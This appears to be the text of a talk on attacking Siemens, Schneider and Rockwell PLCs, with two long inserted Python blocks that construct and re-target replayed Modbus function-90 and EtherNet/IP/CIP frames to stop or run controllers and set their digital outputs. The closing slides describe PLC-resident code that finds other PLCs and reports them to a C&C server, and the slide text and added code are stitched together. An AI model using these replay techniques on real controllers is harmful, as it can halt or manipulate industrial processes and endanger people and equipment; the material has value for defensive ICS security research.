Introduction to Attacking PLCs
Siemens PLC Protocol
Schneider PLC Protocol
Rockwell AB PLC Protocol
Attacking PLCs by PLC
• Replay attacks have been widely used against PLCs.
• Capture the communication sequence (the packets to replay) with Wireshark
• S7-200, S7-300 and S7-400 use the S7Comm protocol
• S7-1200 v3.0 uses the early S7CommPlus protocol
• S7-1200 v4.0 and S7-1500 use the current encrypted S7CommPlus protocol
• In the current S7CommPlus protocol, the Connection packets and the Function packets share a similar structure.
• 1. First Connection Setup Request
• 2. First Connection Setup Response
• 3. Second Connection Setup Request
• 4. Function Packet: Stop PLC
• Using reverse debugging, we found that these encryptions are calculated by TIA Portal in a file named OMSp_core_managed.dll
1. Connection packet encryption
(1) First encryption in the connection packet
The input parameter is the random value array generated by the PLC in the first Connection Setup Response packet. The first encryption is calculated from that value array by XOR (we call this Encryption1):
Value Array -> Encryption1 -> First Encryption
(2) Second encryption in the connection packet
Using the result of the first encryption as input parameter, the second encryption is calculated by a more complex Siemens-private algorithm (Encryption2):
First Encryption -> Encryption2 -> Second Encryption
2. Function packet encryption
The input parameter is a constant field array that carries the Session ID. A complex algorithm (we call this Encryption3) calculates the encryption result of the function packet:
Constant Array (with Session ID) -> Encryption3 -> Function Encryption
Modbus/TCP
Port: 502
Function code: 90 (0x5A)
Unity Pro
1. Get Session ID
2. Run PLC packet
3. Stop PLC packet
4. Write DO value
In the DO value write packet, the first byte is the Session ID and the second byte is the function code (0x50 means write digital value); the 22nd byte is the address and the 29th byte is the value.
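The packet layout just described, as an added example (not code from the original slides): it builds the Modbus/TCP frame for function code 90 with the write-digital-value body, parses it back, and rewrites the Session ID and target before a replay, since a captured write packet is only valid for the Session ID handed out in the "Get Session ID" step. Assumptions: the slide's byte offsets are counted from the byte after the 0x5A function code; the remaining body bytes, which in practice are copied from a capture, are a constructed zero filler here; `build_write_do`, `parse_write_do` and `replay_with_new_session` are illustrative names.

```python
"""Schneider Modbus/TCP (function 90 / 0x5A) write-digital-value packet.
Added example, not code from the original slides. Assumption: the slide's
1-based byte offsets are counted from the first byte after the 0x5A function
code; all other body bytes are a constructed zero filler standing in for bytes
copied from a real capture."""
import struct

MODBUS_TCP_PORT = 502
FC_UMAS = 0x5A             # Modbus function code 90 (Schneider private function)
UMAS_WRITE_DIGITAL = 0x50  # second body byte: "write digital value"

# 1-based offsets from the slide, as 0-based indices into the body after 0x5A
OFF_SESSION = 0    # 1st byte: Session ID
OFF_FUNC = 1       # 2nd byte: function code 0x50
OFF_ADDR = 21      # 22nd byte: output address
OFF_VALUE = 28     # 29th byte: value
BODY_LEN = 29      # constructed: smallest body that holds all four fields


def build_mbap(pdu, transaction_id=1, unit_id=0):
    """Prepend the 7-byte MBAP header; length counts unit id + PDU."""
    return struct.pack(">HHHB", transaction_id, 0, len(pdu) + 1, unit_id) + pdu


def split_mbap(frame):
    """Return (transaction_id, unit_id, pdu), checking the length field."""
    tid, proto, length, unit = struct.unpack(">HHHB", frame[:7])
    pdu = frame[7:]
    if proto != 0 or length != len(pdu) + 1:
        raise ValueError("not a well-formed Modbus/TCP frame")
    return tid, unit, pdu


def build_write_do(session_id, address, value, template=None):
    """Build a write-DO frame; `template` is a captured body (zero filler if None)."""
    body = bytearray(template if template is not None else bytes(BODY_LEN))
    if len(body) < BODY_LEN:
        raise ValueError("body too short for the documented offsets")
    body[OFF_SESSION] = session_id & 0xFF
    body[OFF_FUNC] = UMAS_WRITE_DIGITAL
    body[OFF_ADDR] = address & 0xFF
    body[OFF_VALUE] = 1 if value else 0
    return build_mbap(bytes([FC_UMAS]) + bytes(body))


def parse_write_do(frame):
    """Extract the four documented fields; reject anything that is not a write-DO."""
    tid, unit, pdu = split_mbap(frame)
    if pdu[0] != FC_UMAS or len(pdu) < 1 + BODY_LEN:
        raise ValueError("not a function-90 PDU of the expected size")
    body = pdu[1:]
    if body[OFF_FUNC] != UMAS_WRITE_DIGITAL:
        raise ValueError("not a write-digital-value request")
    return {"transaction_id": tid, "session_id": body[OFF_SESSION],
            "address": body[OFF_ADDR], "value": body[OFF_VALUE]}


def replay_with_new_session(captured, new_session_id, address, value):
    """Replay step: keep the captured body but patch Session ID, address and value."""
    tid, unit, pdu = split_mbap(captured)
    body = bytearray(pdu[1:])
    body[OFF_SESSION] = new_session_id & 0xFF
    body[OFF_ADDR] = address & 0xFF
    body[OFF_VALUE] = 1 if value else 0
    return build_mbap(bytes([FC_UMAS]) + bytes(body), transaction_id=tid + 1, unit_id=unit)


if __name__ == "__main__":
    # Constructed sample: session 0x2A, set output 3 to ON, then re-target for session 0x7B.
    frame = build_write_do(0x2A, 3, 1)
    print(frame.hex())
    print(parse_write_do(frame))
    print(parse_write_do(replay_with_new_session(frame, 0x7B, 5, 0)))
```

The checks in `split_mbap` and `parse_write_do` are also what a passive detector would apply to port-502 traffic: a function-90 PDU whose second body byte is 0x50 is a digital-output write, and the Session ID byte ties it to a preceding "Get Session ID" exchange.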
EtherNet/IP and CIP
Port: 44818
RSLogix
1. EtherNet/IP Connection Packet
The EtherNet/IP connection shown above consists of 4 ENIP packets, with Command 0x0001 (NOP, labelled "Unknown" in the capture), 0x0004 (ListServices), 0x0064 (ListInterfaces) and 0x0065 (RegisterSession). The response to the RegisterSession request carries the Session ID, as shown below.
2. CIP Connection Packet
Once the EtherNet/IP session is established, a CIP Connection Manager request is sent, as shown below. The PLC answers with a CIP Connection Manager response, as shown below. The O->T Network Connection ID from that response plays the role of the Session ID in the following CIP function packets.
The CIP Connection Manager exchange is followed by the CIP connection itself, which consists of 6 packets in total. Every connection packet uses the O->T Network Connection ID and the Originator Serial Number from the CIP Connection Manager response packet (red box and blue box in the figure below). Every CIP packet uses the Sequence Count as the sequence number of the communication (green box below).
3. Run PLC packet
The red box is the O->T Network Connection ID and the blue box is the Originator Serial Number, both taken from the CIP Connection Manager Response packet. The green box is the Sequence Count. The yellow bytes "0x55, 0x01" are the Run PLC function code.
4. Stop PLC packet
Same layout as the Run PLC packet: red box O->T Network Connection ID, blue box Originator Serial Number (both from the CIP Connection Manager Response packet), green box Sequence Count. The yellow bytes "0xf1, 0x01" are the Stop PLC function code.
5. Write Digital Value packet
Same layout: red box O->T Network Connection ID, blue box Originator Serial Number, green box Sequence Count. The yellow box is the function code, the purple box is the address and the orange box is the value.
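The EtherNet/IP part of the sequence above, as an added example (not code from the original slides): it emits the four handshake requests in the slide's order, pulls the Session ID out of the RegisterSession response header, and rebuilds a captured connected CIP packet with the live session handle, O->T Network Connection ID and next Sequence Count, which is the reason a byte-for-byte replay of a capture does not work. The encapsulation header, RegisterSession and SendUnitData layouts follow the public EtherNet/IP specification (little-endian); the session handle, connection ID, sequence count and CIP payload are constructed sample values standing in for the coloured boxes of the figures, and the function names are illustrative.

```python
"""EtherNet/IP session registration and replay of a connected CIP packet.
Added example, not code from the original slides. Header and item layouts
follow the public EtherNet/IP specification; the session handle, O->T
connection ID, sequence count and CIP payload below are constructed samples."""
import struct

ENIP_PORT = 44818
CMD_NOP, CMD_LIST_SERVICES = 0x0001, 0x0004
CMD_LIST_INTERFACES, CMD_REGISTER_SESSION = 0x0064, 0x0065
CMD_SEND_UNIT_DATA = 0x0070
ENCAP_HDR = "<HHII8sI"            # command, length, session, status, sender context, options
ITEM_CONNECTED_ADDRESS = 0x00A1   # carries the O->T Network Connection ID
ITEM_CONNECTED_DATA = 0x00B1      # carries sequence count + CIP message


def build_encap(command, session, data=b"", status=0, context=bytes(8)):
    """24-byte encapsulation header followed by command-specific data."""
    return struct.pack(ENCAP_HDR, command, len(data), session, status, context, 0) + data


def parse_encap(frame):
    cmd, length, session, status, _ctx, _opts = struct.unpack(ENCAP_HDR, frame[:24])
    data = frame[24:24 + length]
    if len(data) != length:
        raise ValueError("truncated encapsulation frame")
    return {"command": cmd, "session": session, "status": status, "data": data}


def enip_handshake_frames():
    """The four requests of the connection sequence, in the slide's order.
    RegisterSession carries protocol version 1 and option flags 0."""
    return [build_encap(CMD_NOP, 0), build_encap(CMD_LIST_SERVICES, 0),
            build_encap(CMD_LIST_INTERFACES, 0),
            build_encap(CMD_REGISTER_SESSION, 0, struct.pack("<HH", 1, 0))]


def session_handle_from_response(frame):
    """The Session ID is the session-handle field of the RegisterSession response."""
    p = parse_encap(frame)
    if p["command"] != CMD_REGISTER_SESSION or p["status"] != 0:
        raise ValueError("RegisterSession failed or wrong command")
    return p["session"]


def build_send_unit_data(session, conn_id, seq, cip):
    """Connected CIP message: Connected Address item (O->T connection ID) plus
    Connected Data item (16-bit sequence count followed by the CIP bytes)."""
    cpf = (struct.pack("<HHI", ITEM_CONNECTED_ADDRESS, 4, conn_id)
           + struct.pack("<HHH", ITEM_CONNECTED_DATA, 2 + len(cip), seq & 0xFFFF) + cip)
    data = struct.pack("<IHH", 0, 0, 2) + cpf   # interface handle 0 (CIP), timeout, item count
    return build_encap(CMD_SEND_UNIT_DATA, session, data)


def parse_send_unit_data(frame):
    p = parse_encap(frame)
    d = p["data"]
    _iface, _timeout, count = struct.unpack("<IHH", d[:8])
    off = 8
    out = {"session": p["session"], "connection_id": None, "sequence": None, "cip": b""}
    for _ in range(count):
        typ, ln = struct.unpack("<HH", d[off:off + 4])
        payload, off = d[off + 4:off + 4 + ln], off + 4 + ln
        if typ == ITEM_CONNECTED_ADDRESS:
            out["connection_id"] = struct.unpack("<I", payload)[0]
        elif typ == ITEM_CONNECTED_DATA:
            out["sequence"], out["cip"] = struct.unpack("<H", payload[:2])[0], payload[2:]
    return out


def rebase_replay(captured, session, conn_id, seq):
    """A captured frame embeds the old session handle, old O->T connection ID and
    a stale sequence count; keep only the CIP bytes (e.g. the run/stop function
    code) and rebuild the rest with the live values."""
    return build_send_unit_data(session, conn_id, seq, parse_send_unit_data(captured)["cip"])


if __name__ == "__main__":
    # Constructed RegisterSession response and a constructed "captured" run-PLC frame
    resp = build_encap(CMD_REGISTER_SESSION, 0x11223344, struct.pack("<HH", 1, 0))
    sid = session_handle_from_response(resp)
    captured = build_send_unit_data(sid, 0x2000ABCD, 7, b"\x55\x01")  # slide's run code bytes
    print(parse_send_unit_data(rebase_replay(captured, 0x01020304, 0x3000EEEE, 8)))
```

The O->T Network Connection ID is produced by the PLC in the CIP Connection Manager (Forward Open) response, so in a live run it comes from parsing that response; here it is passed in as a value, which keeps the example limited to what the slides describe.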
• TCP, ports 502 and 44818
– Schneider PLCs use TCP port 502 (Modbus/TCP)
– AB PLCs use TCP port 44818 (EtherNet/IP)
• TCP
– Replay Modbus and CIP packets against the PLCs inside the network
• TCON, TDISCON
– TCON: establish a TCP connection with another device
– TDISCON: disconnect the established TCP connection
• TSEND, TRCV
– TSEND: send TCP data
– TRCV: receive TCP data
• Packet contents in a DB block
– Keep the detection and attack packets in a DB (data block) on the PLC
PLC detection, finally sending the detected PLCs' information (IP and port) to the C&C server.
Attacking Schneider and AB PLCs.
THANK YOU